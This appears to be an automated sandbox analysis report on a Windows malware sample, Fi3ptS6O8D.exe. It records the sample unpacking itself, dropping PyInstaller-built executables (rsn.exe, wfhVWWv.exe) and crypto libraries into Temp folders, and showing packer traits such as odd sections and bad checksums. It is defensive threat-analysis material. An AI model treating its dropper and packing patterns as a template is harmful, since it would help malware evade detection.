Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Fi3ptS6O8D.exe

Static file information: File size 3237376 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll

Jump to behavior

Source: Fi3ptS6O8D.exe

Static PE information: Raw size of qplxvkoi is bigger than: 0x100000 < 0x2aa800

Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\_win32sysloader.pdb source: rsn.exe, 00000008.00000003.3183647245.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcr90.i386.pdb source: rsn.exe, 00000008.00000003.3186312621.000000000248F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\_hashlib.pdb source: rsn.exe, 00000008.00000003.3182583813.0000000002518000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3350384939.000000006C2D8000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pythoncom.pdb source: rsn.exe, 00000008.00000003.3187965138.000000000096A000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3187718160.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3348254898.000000001E239000.00000002.00000001.01000000.00000012.sdmp, pythoncom27.dll.8.dr
Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pywintypes.pdb source: rsn.exe, 00000008.00000003.3188140030.000000000094D000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3348586778.000000001E7AD000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pythoncom.pdbp% source: rsn.exe, 00000008.00000003.3187965138.000000000096A000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3187718160.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3348254898.000000001E239000.00000002.00000001.01000000.00000012.sdmp, pythoncom27.dll.8.dr
Source:	Binary string: MFCM90.i386.pdb source: rsn.exe, 00000008.00000003.3185061879.0000000000948000.00000004.00000020.00020000.00000000.sdmp, mfcm90.dll.8.dr
Source:	Binary string: C:\build27\cpython\PCBuild\bz2.pdb% source: rsn.exe, 00000008.00000003.3183747902.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3183857549.0000000000950000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3350703285.000000006C33E000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\_socket.pdbEi source: rsn.exe, 00000008.00000003.3182684553.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3182774103.000000000094C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3353381081.000000006FB67000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\unicodedata.pdb source: rsn.exe, 00000008.00000003.3189558331.0000000002480000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3349605949.000000006C144000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: MFCM90.i386.pdb0 source: rsn.exe, 00000008.00000003.3185061879.0000000000948000.00000004.00000020.00020000.00000000.sdmp, mfcm90.dll.8.dr
Source:	Binary string: C:\build27\cpython\PCBuild\python27.pdb source: rsn.exe, 00000008.00000003.3187396576.00000000025C6000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3351615382.000000006C6AA000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: mfc90u.i386.pdb source: rsn.exe, 00000008.00000003.3184869887.0000000002518000.00000004.00000020.00020000.00000000.sdmp, mfc90u.dll.8.dr
Source:	Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: wfhVWWv.exe, 00000027.00000003.3331943733.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: _sqlite3.pyd.39.dr
Source:	Binary string: C:\A\40\b\bin\amd64\_overlapped.pdb source: wfhVWWv.exe, 00000027.00000003.3331356875.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mfc90.i386.pdb source: rsn.exe, 00000008.00000003.3184337790.000000000251A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\bz2.pdb source: rsn.exe, 00000008.00000003.3183747902.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3183857549.0000000000950000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3350703285.000000006C33E000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\select.pdb source: rsn.exe, 00000008.00000003.3188208563.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3350092847.000000006C1F3000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\_tkinter.pdb source: rsn.exe, 00000008.00000003.3183553595.000000000094C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3183465163.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3349409787.000000006C138000.00000002.00000001.01000000.00000017.sdmp, _tkinter.pyd.8.dr
Source:	Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: wfhVWWv.exe, 00000027.00000003.3331020483.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcp90.i386.pdb source: rsn.exe, 00000008.00000003.3185954534.000000000248C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\_ctypes.pdb source: rsn.exe, 00000008.00000003.3182252894.0000000000949000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3353195351.000000006E4E0000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: mfc90.i386.pdbpmxt source: rsn.exe, 00000008.00000003.3184337790.000000000251A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: wfhVWWv.exe, 00000027.00000003.3331020483.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\_socket.pdb source: rsn.exe, 00000008.00000003.3182684553.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3182774103.000000000094C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3353381081.000000006FB67000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_multiprocessing.pdb source: wfhVWWv.exe, 00000027.00000003.3331214227.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pywintypes.pdb$ source: rsn.exe, 00000008.00000003.3188140030.000000000094D000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3348586778.000000001E7AD000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\win32trace.pdb source: rsn.exe, 00000008.00000003.3190225812.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcm90.i386.pdb source: rsn.exe, 00000008.00000003.3185687863.0000000000970000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3185419684.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar32\Release\RAR.pdb source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr
Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\win32ui.pdb source: rsn.exe, 00000008.00000003.3190683394.0000000002485000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\win32api.pdb source: rsn.exe, 00000008.00000003.3189741127.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3189878985.0000000000951000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3348784645.000000001E8CF000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: wfhVWWv.exe, 00000027.00000003.3332097840.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MFCM90U.i386.pdb source: rsn.exe, 00000008.00000003.3185267879.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MFCM90U.i386.pdb0 source: rsn.exe, 00000008.00000003.3185267879.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: wfhVWWv.exe, 00000027.00000003.3329271970.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\win32process.pdb source: rsn.exe, 00000008.00000003.3190029513.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3190123342.000000000094C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3349191576.000000001EBF6000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\_ssl.pdb source: rsn.exe, 00000008.00000003.3183334442.0000000002546000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3351057819.000000006C452000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: wfhVWWv.exe, 00000027.00000003.3329927047.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\win32event.pdb source: rsn.exe, 00000008.00000003.3189972986.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3348984133.000000001E9B4000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar32\Release\RAR.pdb" source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr
Source:	Binary string: C:\build27\cpython\PCBuild\_hashlib.pdb%x source: rsn.exe, 00000008.00000003.3182583813.0000000002518000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3350384939.000000006C2D8000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\pyexpat.pdb source: pyexpat.pyd.39.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Unpacked PE file: 0.2.Fi3ptS6O8D.exe.330000.0.unpack :EW;.rsrc:W;.idata :W;qplxvkoi:EW;cuoxomvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qplxvkoi:EW;cuoxomvg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.5f0000.0.unpack :EW;.rsrc:W;.idata :W;qplxvkoi:EW;cuoxomvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qplxvkoi:EW;cuoxomvg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.5f0000.0.unpack :EW;.rsrc:W;.idata :W;qplxvkoi:EW;cuoxomvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qplxvkoi:EW;cuoxomvg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.5f0000.0.unpack :EW;.rsrc:W;.idata :W;qplxvkoi:EW;cuoxomvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qplxvkoi:EW;cuoxomvg:EW;.taggant:EW;

Source: VCRUNTIME140.dll.39.dr

Static PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe

Code function: 8_2_00184790 MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_00184790

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: win32event.pyd.8.dr	Static PE information: real checksum: 0x0 should be: 0x10d9b
Source: tcl85.dll.8.dr	Static PE information: real checksum: 0xde8d7 should be: 0xdda89
Source: _tkinter.pyd.8.dr	Static PE information: real checksum: 0x0 should be: 0x137a8
Source: _pytransform.dll.39.dr	Static PE information: real checksum: 0x11edfe should be: 0x11dbef
Source: _rust.pyd.39.dr	Static PE information: real checksum: 0x0 should be: 0x7ef99a
Source: _ctypes.pyd.8.dr	Static PE information: real checksum: 0x0 should be: 0x217f3
Source: bz2.pyd.8.dr	Static PE information: real checksum: 0x0 should be: 0x1cba6
Source: _ssl.pyd.8.dr	Static PE information: real checksum: 0x0 should be: 0x15d97a
Source: win32api.pyd.8.dr	Static PE information: real checksum: 0x0 should be: 0x1b0d8
Source: unicodedata.pyd.8.dr	Static PE information: real checksum: 0x0 should be: 0xac2ee
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x31b2a9 should be: 0x31d041
Source: md__mypyc.cp310-win_amd64.pyd.39.dr	Static PE information: real checksum: 0x0 should be: 0x280fa
Source: _socket.pyd.8.dr	Static PE information: real checksum: 0x0 should be: 0x145cb
Source: _hashlib.pyd.8.dr	Static PE information: real checksum: 0x0 should be: 0x1117e2
Source: md.cp310-win_amd64.pyd.39.dr	Static PE information: real checksum: 0x0 should be: 0xf357
Source: select.pyd.8.dr	Static PE information: real checksum: 0x0 should be: 0xe180
Source: python27.dll.8.dr	Static PE information: real checksum: 0x29675c should be: 0x296813
Source: _win32sysloader.pyd.8.dr	Static PE information: real checksum: 0x0 should be: 0x524e
Source: Fi3ptS6O8D.exe	Static PE information: real checksum: 0x31b2a9 should be: 0x31d041
Source: tk85.dll.8.dr	Static PE information: real checksum: 0x14c9fa should be: 0x14bbac
Source: win32ui.pyd.8.dr	Static PE information: real checksum: 0xc71d8 should be: 0xc4283
Source: pythoncom27.dll.8.dr	Static PE information: real checksum: 0x0 should be: 0x6ec5b
Source: win32trace.pyd.8.dr	Static PE information: real checksum: 0x0 should be: 0x51a3
Source: win32process.pyd.8.dr	Static PE information: real checksum: 0x0 should be: 0x184af
Source: pywintypes27.dll.8.dr	Static PE information: real checksum: 0x0 should be: 0x1c2c1

Source: Fi3ptS6O8D.exe	Static PE information: section name:
Source: Fi3ptS6O8D.exe	Static PE information: section name: .idata
Source: Fi3ptS6O8D.exe	Static PE information: section name: qplxvkoi
Source: Fi3ptS6O8D.exe	Static PE information: section name: cuoxomvg
Source: Fi3ptS6O8D.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: qplxvkoi
Source: skotes.exe.0.dr	Static PE information: section name: cuoxomvg
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: _pytransform.dll.39.dr	Static PE information: section name: .xdata
Source: libssl-1_1.dll.39.dr	Static PE information: section name: .00cfg
Source: libcrypto-1_1.dll.39.dr	Static PE information: section name: .00cfg
Source: VCRUNTIME140.dll.39.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_0034D91C push ecx; ret	0_2_0034D92F
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_00341359 push es; ret	0_2_0034135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0060D91C push ecx; ret	2_2_0060D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_0060D91C push ecx; ret	3_2_0060D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00688933 push ebx; mov dword ptr [esp], eax	6_2_00688B35
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00688933 push 1AFD7041h; mov dword ptr [esp], esi	6_2_00688B53
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00688933 push ebx; mov dword ptr [esp], ebp	6_2_00688B5F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00688933 push esi; mov dword ptr [esp], ebp	6_2_00688BA3
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00688933 push edi; mov dword ptr [esp], ecx	6_2_00688BC3
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00688933 push edx; mov dword ptr [esp], ebx	6_2_00688BC9
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00688933 push eax; mov dword ptr [esp], 23D5DE2Fh	6_2_00688C80
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00688933 push edx; mov dword ptr [esp], 3FF31149h	6_2_00688C8C
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00688933 push edx; mov dword ptr [esp], 6BD8F9F2h	6_2_00688D00
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0060D91C push ecx; ret	6_2_0060D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0060DFC6 push ecx; ret	6_2_0060DFD9
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_001885B6 push ecx; ret	8_2_001885C9

Source: Fi3ptS6O8D.exe	Static PE information: section name: entropy: 7.046743626172911
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.046743626172911
Source: msvcr90.dll.8.dr	Static PE information: section name: .text entropy: 6.921830750319084

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe

Process created: "C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe"

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\mfcm90u.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\_win32sysloader.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\_tkinter.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\tk85.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\mfcm90.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\win32ui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\msvcr90.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\tcl85.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\mpc\mpc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI51562\mfc90u.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI27842\libcrypto-1_1.dll	Jump to dropped file
